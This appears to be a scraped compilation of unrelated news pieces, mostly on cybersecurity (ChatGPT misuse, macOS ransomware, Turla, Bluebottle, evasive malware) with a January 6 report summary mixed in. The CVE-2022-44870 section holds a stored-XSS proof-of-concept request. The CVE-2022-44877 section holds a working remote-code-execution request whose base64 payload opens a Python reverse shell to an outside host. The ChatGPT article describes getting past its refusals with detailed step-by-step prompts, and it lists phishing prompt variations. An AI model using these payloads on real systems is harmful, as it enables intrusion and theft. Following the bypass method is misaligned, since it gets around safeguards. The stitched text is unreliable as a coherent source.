The role of artificial intelligence in cybersecurity is growing. A new AI model highlights the opportunities and challenges.

_Artificial intelligence (AI) has the potential to revolutionize many aspects of our lives, including how we approach cybersecurity. However, it also presents new risks and challenges that need to be carefully managed._

_One way that AI can be used in cybersecurity is through the development of intelligent systems that can detect and respond to cyber threats._

This was the AI chatbot’s reply when I asked it to write about AI and cyber threats. I am sure by now you know I am talking about the most popular lad in town, ChatGPT.

In November 2022, OpenAI, an AI research and development company, introduced ChatGPT (Generative Pre-trained Transformer) based on a variation of its InstructGPT model, which is trained on a massive pool of data to answer queries. It interacts in a conversational way once given a detailed prompt, admits mistakes, and even rejects inappropriate requests. Though only available for beta testing right now, it has become extremely popular among the public. OpenAI plans to launch an advanced version, ChatGPT-4, in 2023.

ChatGPT is different from other AI models in the way it can write software in different languages, debug the code, explain a complex topic in multiple ways, prepare for an interview, or draft an essay. Similar to what one can do through Web searches to learn these topics, ChatGPT makes such tasks easier, even providing the final output.

The wave of AI tools and apps has been growing for some time. Before ChatGPT, we saw the Lensa AI app and Dall-E 2 making noise for digitally creating images from text. Though these apps have shown exceptional results that could be nice to use, the digital art community was not very happy that their work, which was used to train these models, is now being used against them as it raised major privacy and ethical concerns. Artists have found their work was used to train the model and now has been used by app users to create images without their consent.

**Pros and Cons**

As with any new technology, ChatGPT has its own benefits and challenges and will have a significant impact on the cybersecurity market.

AI is a promising technology to help develop advanced cybersecurity products. Many believe broader use of AI and machine learning are critical to identifying potential threats more quickly. ChatGPT could play a crucial role in detecting and responding to cyberattacks and improving communication within the organization during such times. It could also be used for bug bounty programs. But where there is the technology, they are cyber-risks, which must not be overlooked.

**Good or Bad Code**

ChatGPT will not write a malware code if asked to write one; it does have guardrails, such as security protocols to identify inappropriate requests.

But in the past few days, developers have tried various ways to bypass the protocols and succeeded to get the desired output. If a prompt is detailed enough to explain to the bot steps of writing the malware instead of a direct prompt, it will answer the prompt, effectively constructing malware on demand.

Considering there are already criminal groups offering malware-as-a-service, with the assistance of an AI program such as ChatGPT, it may soon become quicker and easier for attackers to launch cyberattacks with the help of AI-generated code. ChatGPT has given the power to even less experienced attackers to be able to write a more accurate malware code, which previously could only be done by experts.

**Business Email Compromise**

ChatGPT is excellent at replying to any content query, such as emails and essays. This is especially applicable when paired with an attack method called business email compromise, or BEC.

With BEC, attackers use a template to generate a deceptive email that tricks a recipient into providing the attacker with the information or asset they want.

Security tools are often employed to detect BEC attacks, but with the help of ChatGPT, attackers could potentially have unique content for each email generated for them with the help of AI, making these attacks harder to detect.

Similarly, writing phishing emails may become easier, without any of the typos or unique formats that today are often critical to differentiate these attacks from legitimate emails. The scary part is it’s possible can add as many variations to the prompt, such as "_making the email look urgent_," "_email with a high likelihood of recipients clicking on the link_," "_social engineering email requestion wire transfer_," and so on.

Below was my attempt to see how ChatGPT would reply to my prompt, and it returned results that were surprisingly good.

    

**Where Do We Go From Here?**

ChatGPT tool is transformational in many cybersecurity scenarios if put to good use.

From my experience researching with the tool and from what the public is posting online, ChatGPT is proving to be accurate with most detailed requests, but it still is not as accurate as a human. The more prompts used, the more the model trains itself.

It will be interesting to see what potential uses, positive and negative, come with ChatGPT. One thing is for sure: The industry cannot merely wait and watch if it creates a security problem. Threats from AI are not a new problem it has been around, it's just that now ChatGPT is showing distinct examples that look scary. We expect the security vendors will be more proactive to implement behavioral AI-based tools to detect these AI-generated attacks.

ChatGPT Artificial Intelligence: An Upcoming Cybersecurity Threat?

Microsoft has shed light on four different ransomware families – KeRanger, FileCoder, MacRansom, and EvilQuest – that are known to impact Apple macOS systems.
"While these malware families are old, they exemplify the range of capabilities and malicious behavior possible on the platform," the tech giant's Security Threat Intelligence team said in a Thursday report.
The initial vector for these

Endpoint Security / Cyber Threat

Microsoft has shed light on four different ransomware families – KeRanger, FileCoder, MacRansom, and EvilQuest – that are known to impact Apple macOS systems.

"While these malware families are old, they exemplify the range of capabilities and malicious behavior possible on the platform," the tech giant's Security Threat Intelligence team said in a Thursday report.

The initial vector for these ransomware families involves what the Windows maker calls "user-assisted methods," wherein the victim downloads and installs trojanized applications.

Alternatively, it can also arrive as a second-stage payload that's dropped by an already existing malware on the infected host or as part of a supply chain attack.

Irrespective of the modus operandi employed, the attacks proceed along similar lines, with the threat actors relying on legitimate operating system features and exploiting vulnerabilities to break into the systems and encrypt files of interest.

This includes the use of the Unix find utility as well as library functions like opendir, readdir, and closedir to enumerate files. Another method pointed out by Microsoft, but not adopted by the ransomware strains, entails the NSFileManager Objective-C interface.

KeRanger, MacRansom, and EvilQuest have also been observed to utilize a combination of hardware- and software-based checks to determine if the malware is running in a virtual environment in an attempt to resist analysis and debugging attempts.

KeRanger, notably, employs a technique known as delayed execution to escape detection. It achieves this by sleeping for three days upon its launch before kick-starting its malicious functions.

Persistence, which is essential to ensuring that the malware is run even after a system restart, is established by means of launch agents and kernel queues, Microsoft pointed out.

While FileCoder uses the ZIP utility to encrypt files, KeRanger uses AES encryption in cipher block chaining (CBC) mode to achieve its goals. Both MacRansom and EvilQuest, on the other hand, leverage a symmetric encryption algorithm.

EvilQuest, which was first exposed in July 2020, further goes beyond typical ransomware to incorporate other trojan-like features, such as keylogging, compromising Mach-O files by injecting arbitrary code, and disabling security software.

It also packs in capabilities to execute any file directly from memory, effectively leaving no trace of the payload on disk.

"Ransomware continues to be one of the most prevalent and impactful threats affecting organizations, with attackers constantly evolving their techniques and expanding their tradecraft to cast a wider net of potential targets," Microsoft said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Reveals Tactics Used by 4 Ransomware Families Targeting macOS

The January 6 Committee’s 841-page report will go down as one of the most important documents in US history. These key details stand out.

To put a fine point on it: The Secret Service agents surrounding the Vice President believed they were about to be in a fight to the death to protect the man next in line for presidential succession. I’ve read and written about presidential security and history going back decades, and I can’t think of a parallel set of fears, except perhaps when Vice President Richard Nixon’s motorcade was attacked in Caracas in 1958, which was seen at the time as the “most violent attack ever perpetrated on a high American official while on foreign soil.” 

4\. Big unknowns remain 

As the committee notes, more than 30 witnesses invoked their Fifth Amendment privilege against self-incrimination, leading to some important holes in the committee’s knowledge. As the report says, “The Committee has substantial concerns regarding potential efforts to obstruct its investigation, including by certain counsel (some paid by groups connected to the former President) who may have advised clients to provide false or misleading testimony to the Committee.” It’ll be interesting whether any potential Justice Department indictments and investigations further pry back the lid on the White House and the role of people like Steve Bannon and Roger Stone.

5\. Parts of Trump’s plot targeted every level of government officials involved in counting and certifying elections

One of the most tragic hearings from the January 6 Committee focused last summer on the human toll of President Trump unleashing reckless personal attacks on the relatively anonymous local and state officials in battleground states who were charged with counting and certifying the votes—attacks so vicious and worrisome that some officials, who did nothing wrong and were serving in nonpartisan roles, fled their homes over safety concerns. And the final report is filled with page after page of details about the awful rhetoric—and worse—that Trump directed his supporters to unleash on officials in places like Arizona, Pennsylvania, Michigan, and Georgia. 

In Arizona, the committee reports, “Maricopa County Recorder Adrian Fontes testified before Congress that his family had ‘go-bags’ packed in case they needed to evacuate and that, because of the threats, he had moved his children ‘out of the family home at least once for three days in the wake of serious threats to \[his\] family’s safety.’” In Michigan, after Republican Senate Majority Leader Mike Shirkey and Republican House Speaker Lee Chatfield resisted Trump’s entreaties to overturn the state’s results, “\[Trump\] or his team maliciously tweeted out Shirkey’s personal cell phone number and a number for Chatfield that turned out to be wrong. Shirkey received nearly 4,000 text messages after that, and another private citizen reported being inundated with calls and texts intended for Chatfield.” As the committee says, the threats from Trump and myriad other supporters were un-American and beyond the pale: “This, again, is the conduct of thugs and criminals, each of whom should be held accountable.” 

Beyond the election officials themselves, the report has ample new detail about the Trump campaign’s efforts to create and forward to the National Archives and Congress slates of fake electors, people who would vote for Trump rather than Biden, as their states had properly certified. One of the interesting questions left after the January 6 report is whether state attorneys general or local prosecutors in any state will read and examine the evidence of the fake elector scheme for potential criminal charges too. 

6\. Trump’s legal and criminal exposure is real 

The January 6 Committee’s own criminal referrals made headlines in December, but the final report reminds us that federal judge David Carter also concluded as part of the court fight over the committee’s work that President Trump likely violated two criminal statutes: 18 U.S.C. § 1512(c) (corruptly obstructing, impeding or influencing Congress’s official proceeding to count electoral votes); and 18 U.S.C. § 371 (conspiring to defraud the United States). And indeed, any prosecutor looking at this report will see both plenty of evidence of corrupt acts and, notably, _knowledge_ that Trump understood he was acting corruptly—because White House aides, lawyers, and campaign officials kept telling him he was doing so. As the committee wrote, “President Trump made corrupt, dishonest, and unlawful choices to pursue his plans.”

7\. The Justice Department came close to a meltdown 

As someone who has written books about Nixon’s 1973 Saturday Night Massacre and the 2005 Comey-Mueller-Bush showdown over the NSA wiretapping program STELLAR WIND, my eyes were wide open as I read the sections about how Trump tried to install Jeffrey Clark as acting attorney general in one of his final gambits to overturn the election—an event that almost caused the entire leadership of the Justice Department to resign. Bill Barr, of course, had resigned early, leaving acting attorney general Jeffrey Rosen in charge of the department in January 2021, alongside acting deputy attorney general Richard Donoghue. The two faced down Trump as he tried to install Clark, who was willing to sign a letter saying DOJ had doubts about the election. Donoghue saw the possibility the letter “may very well have spiraled us into a constitutional crisis,” and White House counsel Pat Cipollone declared it a “murder-suicide pact.”

While Trump persisted, he was informed that all of the other assistant attorneys general would resign if he pushed the change—but the committee’s work found that even as the showdown unfolded, “contemporaneous White House documents suggest that Clark had _already_ \[italics in original\] been appointed as the acting attorney general.” Ultimately, Trump backed down as the potential mass resignations spiraled, and was told by assistant attorney general Steve Engel—himself a beloved Trump appointee—that “Clark would be here by himself with a hostile building, those folks who remained, and nothing would get done.” Clark, Engel said, would be leading a “graveyard.” Trump finally said, “It’s not going to be worth the breakage,” and dropped the plan.

8\. The US government had reliable, solid intelligence that bad stuff might happen on January 6—and it failed to take action

The committee makes clear in the second sentence of its executive summary that Trump owns everything that happened on January 6, saying its “overriding and straightforward conclusion: the central cause of January 6 was one man, former President Donald Trump, whom many others followed. None of the events of January 6 would have happened without him.” But it’s also clear from the committee report that the US government, both its security agencies and top White House staff, failed to act on warnings that armed, violent individuals were coming to Washington on January 6 in response to the president’s tweet on December 19, 2020, summoning them and promising, “Be there, will be wild!”

In fact, no less than the chairman of the Joint Chiefs of Staff, Gen. Mark Milley, remembers deputy secretary of defense David Norquist saying on a National Security Council call, “the greatest threat is a direct assault on the Capitol.” As Milley says, “I’ll never forget it.” The Secret Service was warned repeatedly, including on Christmas Eve in a document entitled “Armed and Ready, Mr. President” that summarized worrisome tweets, and at a December 30 internal intelligence briefing that specifically mentioned the fiery presidential tweet. The Capitol Police were warned, both by civilian extremism researchers as well as by the Secret Service itself, which forwarded warnings on December 29. The FBI issued a DC-area intelligence bulletin on January 5, warning of “Potential for Violence in Washington, D.C. Area in Connection with Planned ‘StopTheSteal’ Protest on 6 January 2021.” The bulletin even included maps of the Capitol that had been posted to a pro-Trump website. And there was a lot more beyond.

January 6 Report: 11 Details You May Have Missed

A reflected cross-site scripting (XSS) vulnerability in maccms10 v2022.1000.3032 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the AD Management module.

**CVE-2022-44870**

maccms admin+ xss attacks

Overview

Manufacturer's website information：https://maccms.pro

Source code download address ： https://github.com/maccmspro/maccms10.git

1.  Affected version: V2021.1000.2000

2.Vulnerability details

maccmspro/maccms10#23

Go to background, go to Basics > AD Management > Name,

Insert payload1 in the name box:

It can cause XSS attacks.

Vulnerability name：Storage type xss

Vulnerability level：Medium risk

Vulnerability location： Advertising management-->name

Insert <script>alert(1)</script> at cat\_title

http://127.0.0.1/admin.php/admin/banner/infocat.html

3.Recurring vulnerabilities and POC

POST /admin.php/admin/banner/infocat.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0

Accept: _/_

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 65

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/banner/infocat.html

Cookie: PHPSESSID=qgaks01bl6ip8j7fseaabj4l9q

cat\_id=&cat\_title=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cat\_code=111

CVE-2022-44870: CVE-2022-44870/README.md at main · Cedric1314/CVE-2022-44870

RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.

\# Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877

\[+\] Centos Web Panel 7 Unauthenticated Remote Code Execution

\[+\] Centos Web Panel 7 - < 0.9.8.1147

\[+\] Affected Component ip:2031/login/index.php?login=$(whoami)

\[+\] Discoverer: Numan Türle @ Gais Cyber Security

\[+\] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194

\## Proof of concept:

POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1

Host: 10.13.37.10:2031

Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82

Content-Length: 40

Origin: https://10.13.37.10:2031

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: https://10.13.37.10:2031/login/index.php?login=failed

Accept-Encoding: gzip, deflate

Accept-Language: en

Connection: close

username=root&password=toor&commit=Login

\## Solution

Upgrade to CWP7 current version.

CVE-2022-44877: # Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877

Encrypting data while in use, not just in transit and at rest, closes one more avenue of cyberattack.

Digital transformation initiatives, spurred by COVID-19, are helping companies scale new heights in efficiency and productivity. However, they have also highlighted to enterprise leaders the need for tighter cybersecurity measures — especially as attackers continue to ride the wave of new technologies to launch sophisticated attacks. The number of records exposed in data breaches consistently went up throughout 2022 — 3.33 million records in the first quarter of 2022, 5.54 million records in the second quarter, and 14.78 million records in the third quarter — according to data from Statista.

Organizations face various challenges as they grapple with managing and securing the explosion of data created, in part, by remote environments. This, coupled with the lack of visibility across dispersed networks and growing migration to the cloud, has increased the risk of attacks across multiple industries, including healthcare, financial services, and decentralized finance (DeFi).

Confidential computing segregates data and code from the host computer's system and makes it harder for unauthorized third parties to access the data. The way that confidential computing protects sensitive data could smooth the way for increased cloud adoption in highly regulated sectors such as finance and healthcare, according to Gartner.

As more organizations handle large volumes of data, ushering in a greater need for privacy and data security, confidential computing is poised to close that security gap by ensuring data remains confidential at all times — while at rest, in transit, and in use.

**A Different Approach to Cybersecurity**

Most encryption schemes focus on protecting while at rest, or while in transit. Confidential computing protects data while in use — by allowing data to remain encrypted even as it’s being processed and used in applications. The market for confidential computing is expected to grow up to $54 billion by 2026, according to a report by Everest Group.

"Everybody wants to continue to reduce the attack surface of data. Up to this point, it is obviously encrypted in transit and at rest. Confidential computing solves the encrypted in-use at the infrastructure level," said Justin Boitano, vice president and general manager of Nvidia's enterprise and edge computing operations, in a previous article on Dark Reading.

Anil Rao, vice president and general manager for systems architecture and engineering at Intel's office of the chief technology officer, also noted in the article that confidential computing will also help enterprises build a new class of applications where third-party data sets can mingle with proprietary data sets in a secure area to create better learning models.

The hardware element of confidential computing makes it uniquely secure, says Jay Harel, VP of product at Opaque Systems. "A hacker must literally crack the CPU open and tap into the silicon die in order to steal any confidential data," Harel says. "Most data breaches happen remotely, over the Internet. Confidential computing requires physical access to the hardware, making a breach much less likely."

Cloud vendors Microsoft Azure and Google Cloud make confidential computing available through CPUs from Intel and AMD, while Amazon AWS uses its own Nitro technology. "I wouldn't say that the hardware is fully mainstream yet, as most compute resources offered by these vendors still don't have confidential computing capabilities," Harel notes.

As Noam Dror, senior vice president of solution engineering at Hub Security, puts it, "Today, when hackers get past standard security controls, they can access data in use which is totally exposed and unencrypted. Existing cybersecurity measures have a hard time dealing with these issues. This is where confidential computing comes in, providing comprehensive cyber protection across all levels. These most sensitive data must be protected leveraging confidential computing because the computing environment will always be vulnerable."

**Helps Industries Share Data Securely**

The confidential computing approach to cybersecurity offers several advantages, particularly in sectors where client or patient data is highly sensitive and regulated — like the healthcare sector, for example. In such sectors, confidential computing can enable secure multiparty training of AI for different purposes and ensure data privacy.

Cloud security company Fortanix says that financial services in particular should invest in confidential computing, for several reasons: it involves masses of personally identifiable information (PII), it is heavily regulated, its monetary value attracts attention from cyber criminals, and "it's an industry that hasn't figured out a secure way to share valuable data among each other that can be used to detect fraud or money laundering," a Fortanix spokesperson says. Fortanix adds it is also seeing interest in confidential computing from industries with similar characteristics, such as healthcare enterprises and government entities.

"Confidential computing reduces the trusted computing base to the minimum. It takes the trust away from configuration files, and secrets and passwords managed by humans, which can be error-prone. The trust circle is reduced to the CPU, and the application, and everything in between — the operating system, the network, the administrators, can be removed from that trust circle. Confidential computing gets closest to achieving zero trust when establishing communication between app-to-app or machine-to-machine," Fortanix says.

**Complete Control Over Data**

Today's protective solutions are insufficient and leave critical data exposed. Cloud providers AMD, Intel, Google Cloud, Microsoft Azure, Amazon Web Services, Red Hat, and IBM have already deployed confidential computing offerings. A growing number of cybersecurity companies, including Fortinet, Anjuna Security, Gradient Flow, and Hub Security, are also providing such solutions.

Harel says, "Confidential computing is a natural addition to their security arsenal, allowing them to evolve their breach defense and take it to the next level. It allows them to finally protect data in use, after spending decades and billions of dollars protecting data at rest and in transit."

Nataraj Nagaratnam, IBM distinguished engineer and CTO for cloud security, believes that confidential computing is a game-changer, especially because it gives customers complete control of their data. "Confidential computing primarily aims to provide greater assurance to companies that their data in the cloud is protected and confidential. It encourages companies to move more of their sensitive data and computing workloads to public cloud services," he notes.

How Confidential Computing Can Change Cybersecurity

The infamous, FSB-connected Turla group took over other hackers' servers, exploiting their USB drive malware for targeted espionage.

The Russian cyberespionage group known as Turla became infamous in 2008 as the hackers behind agent.btz, a virulent piece of malware that spread through US Department of Defense systems, gaining widespread access via infected USB drives plugged in by unsuspecting Pentagon staffers. Now, 15 years later, the same group appears to be trying a new twist on that trick: hijacking the USB infections of _other_ hackers to piggyback on their infections and stealthily choose their spying targets.

Today, cybersecurity firm Mandiant revealed that it has found an incident in which, it says, Turla's hackers—widely believed to work in the service of Russia’s FSB intelligence agency—gained access to victim networks by registering the expired domains of nearly decade-old cybercriminal malware that spread via infected USB drives. As a result, Turla was able to take over the command-and-control servers for that malware, hermit-crab style, and sift through its victims to find ones worthy of espionage targeting.

That hijacking technique appears designed to let Turla stay undetected, hiding inside other hackers’ footprints while combing through a vast collection of networks. And it shows how the Russian group’s methods have evolved and become far more sophisticated over the past decade and a half, says John Hultquist, who leads intelligence analysis at Mandiant. “Because the malware already proliferated through USB, Turla can leverage that without exposing themselves. Rather than use their own USB tools like agent.btz, they can sit on someone else’s,” Hultquist says. “They’re piggybacking on other people’s operations. It’s a really clever way of doing business.”

Mandiant’s discovery of Turla’s new technique first came to light in September of last year, when the company’s incident responders found a curious breach of a network in Ukraine, a country that’s become a primary focus of all Kremlin intel services after Russia’s catastrophic invasion last February. Several computers on that network had been infected after someone inserted a USB drive into one of their ports and double-clicked on a malicious file on the drive that had been disguised as a folder, installing a piece of malware called Andromeda.

Andromeda is a relatively common banking trojan that cybercriminals have used to steal victims’ credentials since as early as 2013. But on one of the infected machines, Mandiant’s analysts saw that the Andromeda sample had quietly downloaded two other, more interesting pieces of malware. The first, a reconnaissance tool called Kopiluwak, has been previously used by Turla; the second piece of malware, a backdoor known as Quietcanary that compressed and siphoned carefully selected data off the target computer, has been used exclusively by Turla in the past. “That was a red flag for us,” says Mandiant threat intelligence analyst Gabby Roncone.

When Mandiant looked at the command-and-control servers for the Andromeda malware that had started that infection chain, its analysts saw that the domain used to control the Andromeda sample—whose name was a vulgar taunt of the antivirus industry—had actually expired and been reregistered in early 2022. Looking at other Andromeda samples and their command-and-control domains, Mandiant saw that at least two more expired domains had been reregistered. In total, those domains connected to hundreds of Andromeda infections, all of which Turla could sort through to find subjects worthy of their spying.

“By doing this you can basically lay under the radar much better. You’re not spamming a bunch of people, you’re letting someone else spam a bunch of people,” says Hultquist. “Then you started picking and choosing which targets are worth your time and your exposure.”

In fact, Mandiant only found that single instance in Ukraine of the hijacked Andromeda infection distributing Turla’s malware. But the company suspects that there were likely more. Hultquist warns there’s no reason to believe the stealthy targeted spying that piggybacked off Andromeda’s USB infections would be limited to just one target, or even to just Ukraine. “Turla has a global intelligence collection mandate,” he says.

Turla has a long history of using clever tricks to hide the control of its malware, and even to hijack the control of other hackers, as Mandiant saw in this most recent case. Cybersecurity firm Kaspersky revealed in 2015 that Turla had taken control of satellite internet connections to obscure the location of its command-and-control servers. In 2019, Britain’s GCHQ intelligence agency warned that Turla had silently commandeered Iranian hackers’ servers to conceal themselves and confuse detectives trying to identify them.

Those innovative techniques have made the group a particular obsession for many cybersecurity researchers, who have traced its fingerprints all the way back to Moonlight Maze, one of the first-ever state-sponsored hacking campaigns, discovered in the late 1990s. Turla’s agent.btz thumbdrive malware represented another historic moment for the group: It resulted in a Pentagon initiative called Operation Buckshot Yankee, designed to vastly upgrade the Defense Department’s cybersecurity after the group’s embarrassing USB-based breach.

Mandiant’s discovery of another, stealthier USB-based hacking technique in Turla’s hands should serve as a reminder that even now, 15 years later, that USB-based intrusion vector has hardly disappeared. Plug an infected drive into your USB port today, it seems, and you may be offering an invitation to not only undiscerning cybercriminals, but also a far more sophisticated breed of operative hiding behind them.

Turla, a Russian Espionage Group, Piggybacked on Other Hackers' USB Infections

The financially motivated threat group, also known as OPERA1ER, demonstrated an evolution in tactics in its compromise of three Francophone financial institutions in Africa, likely adding to its $11 million to-date haul.

A criminal group, which has already stolen nearly $11 million by specializing in targeted attacks against the financial sector, has French-speaking African banks in its crosshairs in a recent campaign that demonstrates an evolution in tactics, researchers have found.

Bluebottle, aka OPERA1ER, compromised three different financial institutions in three separate African nations between mid-July and September, affecting multiple machines in all three organizations, researchers from Symantec revealed in a blog post published on Jan. 5.

Though it's unclear if the group was able to capitalize financially on the activity, it's significant because the different payloads and other tactics that Bluebottle used in the campaign vary from previous offensives by the group, Sylvester Segura, Symantec threat intelligence analyst, tells Dark Reading. 

In particular, Bluebottle used commodity malware GuLoader and malicious ISO files in the initial stages of the attack — which it hasn't done before — as well as abused kernel drivers with a signed driver that has been linked to other attacks such as ransomware, Segura says.

These "all indicate the Bluebottle group is keeping up to date with the tools and techniques that other threat actors are currently using," he says. "They may not be the most advanced, but this latest activity proves they are following attacker trends in tooling and techniques."

Indeed, the use of signed drivers in particular shows that Bluebottle — a financially motivated group first observed in 2019 — is aiming to up its game in this latest spate of activity, forcing enterprises to do the same in terms of defensive maneuvers, Segura says.

"More and more 'less advanced' attackers are aware of the impact they can have by disabling detection solutions through various means such as using signed drivers," he notes. "To prevent the trust we put in software like signed drivers from becoming a single point of failure, enterprises need to employ as many layers of detection and protection as they reasonably can."

**Keeping Up With Bluebottle****

Group-IB first began tracking Bluebottle, which it calls OPERA1ER, in activity that spanned from mid-2019 to 2021. During this period, the group stole at least $11 million in the course of 30 targeted attacks, researchers said in a report published in November. The group typically infiltrates a financial organization and moves laterally, scooping up credentials that it can use for fraudulent transfers and other funds-stealing activity.

The activity that Symantec observed started in mid-July, when researchers spotted job-themed malware on one of the infected systems, which they believe could have been the result of a spear-phishing campaign — though they said they are not certain of the group's initial point of entry.

"These likely acted as lures," researchers wrote in the post. "In some cases, the malware was named to trick the user into thinking it was a PDF file."

Symantec researchers linked the group to the previous OPERA1ER activity reported by Group-1B because it shared the same domain, used similar tools, included no custom malware, and also targeted Francophone nations in Africa, they said.

****Living Off the Land****

After noticing the job-themed malware, researchers then observed the deployment of a downloader before detecting the commercial Sharphound hacktool as well as a tool called fakelogonscreen, researchers said. Then, about three weeks after this initial compromise, researchers saw attackers using a command prompt and PsExec for lateral movement.

"It appears the attackers were 'hands on keyboard' at this point of the attack," researchers wrote in the post, using various dual-use and living-off-the-land (LotL) tools for a number of purposes during their occupation of the network.

These tools included Quser for user discovery, Ping for checking Internet connectivity, Ngrok for network tunneling, Net localgroup/add for adding users, the Fortinet VPN client most likely for a secondary access channel, Xcopy to copy RDP wrapper files, and Netsh to open port 3389 in the firewall, among several others.

As previously mentioned, Bluebottle also used commodity tools GuLoader as well as Mimikatz, Revealer Keylogger, Backdoor.Cobalt, Netwire RAT, and the malicious DLL and driver for killing processes during their activity, along with "multiple other unknown files," the researchers wrote.

Some of the tools — such as GuLoader — were deployed across all three victims; other activity linking the three victims included the use of the same .NET downloader, malicious driver, and at least one overlapping transfer\[.\]sh URL, they said.

Researchers observed the last activity on the compromised network in September; however, the Ngrok tunneling tool remained on the network until November, they said.

****How Enterprises Can Respond****

Since Bluebottle uses mainly commodity RATs and other malware in its activity, enterprises can mitigate attacks from this threat group by ensuring they have good endpoint protection against such threats, Segura says.

"Furthermore, an extended detection and response solution should also help detect their abuse of living off the land tools like PsExec during attempted lateral movement," he says.

Since Bluebottle typically goes after credentials immediately in its attacks for financial gain, multifactor authentication can also go a long way in helping enterprises protect accounts and monitor for suspicious account activity, Segura says.

Other steps enterprises can take to counter activity from Bluebottle specifically include allowing applications that "will help prevent the malicious use of dual-use tools like Ngrok, which they use for hiding their presence," he says.

"Finally, training employees to look out for phishing and other malicious emails is going to be crucial to prevent a group like this from intruding in the first place," Segura adds.

**

Bluebottle Continues Bank Heist Assault With Signed Malware

Security teams may be missing targeted attacks and advanced exploits if attackers are using evasive techniques to avoid detection. Defenders need to up their game.

Attackers today combine state-of-the-art obfuscation and adaptive environment-specific features to avoid detection by traditional malware analysis systems. If your security team is relying on legacy approaches, like traditional sandboxing, to scan files entering your network, they may miss these dangerous exploits targeting your organization. If your security teams are spending their time with easy-to-detect, common vulnerabilities and not on the targeted attacks, they are exposing your organization to unnecessary risk from cybercriminals.

Nothing about this pattern is new: Researchers develop new anti-malware technology to detect malware attacks. Cybercriminals adapt their malware variants to avoid detection. And the cycle continues.

Attackers are adopting techniques, such as machine fingerprinting and geofencing, where they use information about the victim's application stack and system environments to compromise systems.

**Gotta Catch 'Em All: Geofencing**

There are many ways for malware to get on a victim's machine. Once there, some malware variants remain dormant if the victim's machine or network is not in a specific country. That comes courtesy of geofencing.

The malware looks up the external IP address geographic region via an external database or service and checks whether the device is located in the target region. If the device's geographic location is in a region of interest, the malware detonates. It may install a second-stage malware; steal useful information, such as administrator credentials; exfiltrate data to a system controlled by criminals; and remove all traces of its activity on the machine.

Attackers add geofencing features to malware for many reasons. It may be easier to evade detection by locations with strong security postures. Sometimes they don't want to infect networks in their home countries, where they could face prosecution. Savvy criminals target wealthy countries inhabited by trusting folks who are more likely to open documents and pay ransom. Or they may know that business leaders in a specific region rely on weak defensive postures or are less likely to use two-factor authentication.

One example of a region–specific attack: The South Korean government widely uses the Hangul Word Processor (HWP). North Korean attackers write malware in Hangul to penetrate critical government systems. Trying to use this malware to compromise US government employees, however, would be a waste of resources.

**Finding the Golden Image: Fingerprinting**

Malware authors rely on diverse fingerprinting techniques to determine whether machines are susceptible to their attack chains. Fingerprinting helps malware avoid detection by appearing harmless to antivirus technologies.

The malware remains dormant on the victim's machine unless the environment meets predefined conditions — such as having a specific application installed or certain configuration settings enabled. Attackers also use fingerprinting techniques to figure out whether the compromised system is actually a virtual machine using a preconfigured, out-of-the-box or initial install image. If that is the case, the malware does not detonate.

**What Adaptive and Dynamic Analysis Looks Like**

Traditional sandboxes may not detect advanced malware or targeted zero-day attacks if the attacker is using techniques such as geofencing or fingerprinting. For example, malware that uses geofencing must look up IP addresses to determine its geographic location. In contrast, adaptive dynamic analysis technology can help detect very specific, targeted attacks because it can detect and automatically bypass environment and anti-analysis checks. 

Adaptive analysis performs execution only of instructions related to the malware, as opposed to traditional sandboxes, which are fully virtualized operating systems executing instructions of every service and application on the system. As a result, the total resource utilization for adaptive analysis is significantly lower. Being able to extract intelligence in the form of indicators of compromise (IOCs) enables threat hunting, proactive self-defense improvements, and threat actor attribution.

Threat Actors Evade Detection Through Geofencing & Fingerprinting

Amid escalating cyber activity, two separate cybersecurity frameworks are targeting the satellite arena, highlighting the ease in attacking the infrastructure and the difficulty in defending it.

With cyberattacks becoming a reality against the space sector's infrastructure in 2022, two groups are aiming to get ahead of future attacks by creating framework initiatives.

The goal of the frameworks is to better understand not only potential threats — in terms of the traditional tactics, techniques, and procedures (TTPs) applied to the space sector — but also to help companies and government agencies create countermeasures against attacks targeting satellites and spacecraft.

On Jan. 3, the US National Institute of Standards and Technology (NIST) and the MITRE Corp., which is also a government contractor, released a version of the NIST Cybersecurity Framework tailored to the ground-based portion of the space sector. The NIST publication complements another effort by nonprofit government contractor The Aerospace Corp., which created in October the Space Attack Research and Tactics Analysis (Sparta) matrix, a version of the MITRE ATT&CK framework applied to threats against space-based infrastructure.

**Cyberattacks Are Now Targeting Satellites**

